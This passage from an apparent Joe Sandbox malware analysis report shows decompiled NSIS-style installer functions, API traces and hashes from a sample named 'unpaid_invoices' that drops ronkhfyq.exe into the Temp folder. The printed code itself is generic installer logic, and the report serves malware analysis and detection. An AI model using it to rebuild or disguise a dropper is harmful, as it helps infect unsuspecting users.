              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: File$Pointer$ByteCharMultiWide$Read
              • String ID: 9
              • API String ID: 163830602-2366072709
              • Opcode ID: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
              • Instruction ID: 3e360b617c3737f2e779930334e882a7207aef4f73e2c1e076e29b282e1bb3de
              • Opcode Fuzzy Hash: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
              • Instruction Fuzzy Hash: 60510B75D00219ABDF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004056D0 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004056D0(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x7a7a84;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x7a8b54;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066AB(_t38, 0, 0x7a0f68, 0x7a0f68, _a4);
					}
					_t27 = lstrlenW(0x7a0f68);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x7a7a68, 0x7a0f68);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x7a0f68;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x7a0f68[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x7a0f68, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















              0x004056d6
              0x004056e0
              0x004056e5
              0x004056eb
              0x004056f6
              0x004056f9
              0x004056fc
              0x00405702
              0x00405702
              0x00405708
              0x00405710
              0x00405713
              0x00405730
              0x00405734
              0x0040573d
              0x0040573d
              0x00405747
              0x00405750
              0x0040575c
              0x00405763
              0x00405767
              0x0040576a
              0x0040577d
              0x0040578b
              0x0040578b
              0x0040578f
              0x00405791
              0x00405794
              0x00000000
              0x00405794
              0x00405715
              0x0040571d
              0x00405725
              0x0040572b
              0x00000000
              0x0040572b
              0x00405725
              0x00405713
              0x004057a0

              APIs
              • lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
              • lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
              • lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
              • SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                • Part of subcall function 004066AB: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
                • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: MessageSendlstrlen$lstrcat$TextWindow
              • String ID:
              • API String ID: 1495540970-0
              • Opcode ID: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
              • Instruction ID: b1df74b24ef97eccf04675f52fbaffa54a328febca5869b92639b2b84e823bb6
              • Opcode Fuzzy Hash: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
              • Instruction Fuzzy Hash: 32219D71900518FACF119FA5DD84ACFBFB8EF85350F10842AF904B6290C7794A40DFA8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004068F5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
              Download Yara Rule
              C-Code - Quality: 91%
              			E004068F5(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FB4(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F6A(L"*?|<>/\":", _t5))) == 0) {
							E00406119(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








              0x004068f7
              0x00406900
              0x00406917
              0x00406917
              0x0040691e
              0x0040692a
              0x0040692a
              0x0040692d
              0x00406930
              0x00406935
              0x00406937
              0x00406940
              0x00406944
              0x00406961
              0x00406969
              0x00406969
              0x0040696e
              0x00406970
              0x00406973
              0x00406978
              0x00406979
              0x0040697d
              0x0040697d
              0x0040697e
              0x00406985
              0x00406987
              0x0040698e
              0x00000000
              0x00000000
              0x00406996
              0x0040699c
              0x00000000
              0x00000000
              0x00000000
              0x0040699c
              0x004069a1

              APIs
              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406958
              • CharNextW.USER32(?,?,?,00000000,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406967
              • CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040696C
              • CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040697F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Char$Next$Prev
              • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
              • API String ID: 589700163-4010320282
              • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
              • Instruction ID: be6858c8d4b602c62de40fdc636a35535680886f1e3ed17f643e47e9e10769a1
              • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
              • Instruction Fuzzy Hash: 0D11E6A580060295DB302B148C40A7762E8AF94750F12403FE98AB36C1E7BC4CA2C6BD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x79f73c;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x79f73c = 0;
					return _t15;
				}
				if( *0x79f73c != 0) {
					return E00406A77(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x7a8aac) {
					if( *0x7a8aa8 == 0) {
						_t7 = CreateDialogParamW( *0x7a8aa0, 0x6f, 0, E00402F93, 0);
						 *0x79f73c = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x7a8b54 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056D0(0,  &_v132);
					}
				}
				return _t6;
			}







              0x0040303d
              0x0040303f
              0x00403046
              0x00403049
              0x00403049
              0x0040304f
              0x00000000
              0x0040304f
              0x0040305d
              0x00000000
              0x00403060
              0x00403067
              0x00403073
              0x0040307b
              0x004030b9
              0x004030c2
              0x00000000
              0x004030c7
              0x00403084
              0x00403095
              0x00000000
              0x004030a3
              0x00403084
              0x004030cf

              APIs
              • DestroyWindow.USER32(?,00000000), ref: 00403049
              • GetTickCount.KERNEL32 ref: 00403067
              • wsprintfW.USER32 ref: 00403095
                • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                • Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
                • Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
                • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
              • CreateDialogParamW.USER32 ref: 004030B9
              • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
              • String ID: ... %d%%
              • API String ID: 722711167-2449383134
              • Opcode ID: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
              • Instruction ID: 36a9105e1bf518e5a00a94211bbaadb265df24d4843d4ed97aac6270594080be
              • Opcode Fuzzy Hash: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
              • Instruction Fuzzy Hash: 40015B70413610ABC7217FA0AD49A9A7FACAB01B06F50853BF441F25E9DA7C46458B9E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404F85 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00404F85(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














              0x00404f93
              0x00404fa0
              0x00404fa6
              0x00404fe4
              0x00404fe4
              0x00404ff3
              0x00404ffa
              0x00000000
              0x00404ffc
              0x00404fa8
              0x00404fb7
              0x00404fbf
              0x00404fc2
              0x00404fd4
              0x00404fda
              0x00404fe1
              0x00000000
              0x00404fe1
              0x00000000

              APIs
              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FA0
              • GetMessagePos.USER32 ref: 00404FA8
              • ScreenToClient.USER32 ref: 00404FC2
              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FD4
              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FFA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Message$Send$ClientScreen
              • String ID: f
              • API String ID: 41195575-1993550816
              • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
              • Instruction ID: 51d4338ac073bbeac8b2964ce5aa15998fcdd55d82c6f64f668885239b8ba4c4
              • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
              • Instruction Fuzzy Hash: D6015E7194021DBADB00DBA5DD85FFEBBBCAF54711F10012BBB50B61C0D7B49A058BA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x7a8ab0 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






              0x00402fa3
              0x00402fb1
              0x00402fb7
              0x00402fb7
              0x00402fc5
              0x00402fc7
              0x00402fd3
              0x00402fd8
              0x00402fda
              0x00402fda
              0x00402fe5
              0x00402ff5
              0x00403007
              0x00403007
              0x0040300f

              APIs
              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
              • wsprintfW.USER32 ref: 00402FE5
              • SetWindowTextW.USER32(?,?), ref: 00402FF5
              • SetDlgItemTextW.USER32 ref: 00403007
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Text$ItemTimerWindowwsprintf
              • String ID: unpacking data: %d%%$verifying installer: %d%%
              • API String ID: 1451636040-1158693248
              • Opcode ID: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
              • Instruction ID: 8fb0b87627a2e5c232f470bc2292a7be8d93e7e9342cf65e243ccc0cc3a46c1c
              • Opcode Fuzzy Hash: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
              • Instruction Fuzzy Hash: 74F0367050020DABEF246F50DD49BEA3B69EB40309F00C03AF606B51D0DBBD99549B59
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
              Download Yara Rule
              C-Code - Quality: 93%
              			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FB4(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406139(_t55);
				_t29 = E0040615E(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x7a8ab4;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035FE(_t49);
							E004035E8(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403377(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406119( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E00406210( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403377(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













              0x00402950
              0x00402952
              0x00402957
              0x0040295c
              0x0040295f
              0x00402969
              0x0040296d
              0x0040296d
              0x00402973
              0x00402980
              0x00402988
              0x0040298b
              0x00402997
              0x0040299a
              0x004029a0
              0x004029ae
              0x004029b3
              0x004029b7
              0x004029ba
              0x004029c3
              0x004029cf
              0x004029d3
              0x004029d6
              0x004029e0
              0x004029ff
              0x004029e7
              0x004029ec
              0x004029f4
              0x004029f7
              0x004029fc
              0x004029fc
              0x00402a06
              0x00402a06
              0x00402a13
              0x00402a19
              0x00402a1f
              0x00402a1f
              0x004029b7
              0x00402a33
              0x00402a35
              0x00402a35
              0x00402a3f
              0x00402a40
              0x00402a44
              0x00402a48
              0x00402a4e
              0x00402a4e
              0x00402a55
              0x004022f1
              0x00402c2d
              0x00402c39

              APIs
              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
              • GlobalFree.KERNEL32 ref: 00402A06
              • GlobalFree.KERNEL32 ref: 00402A19
              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
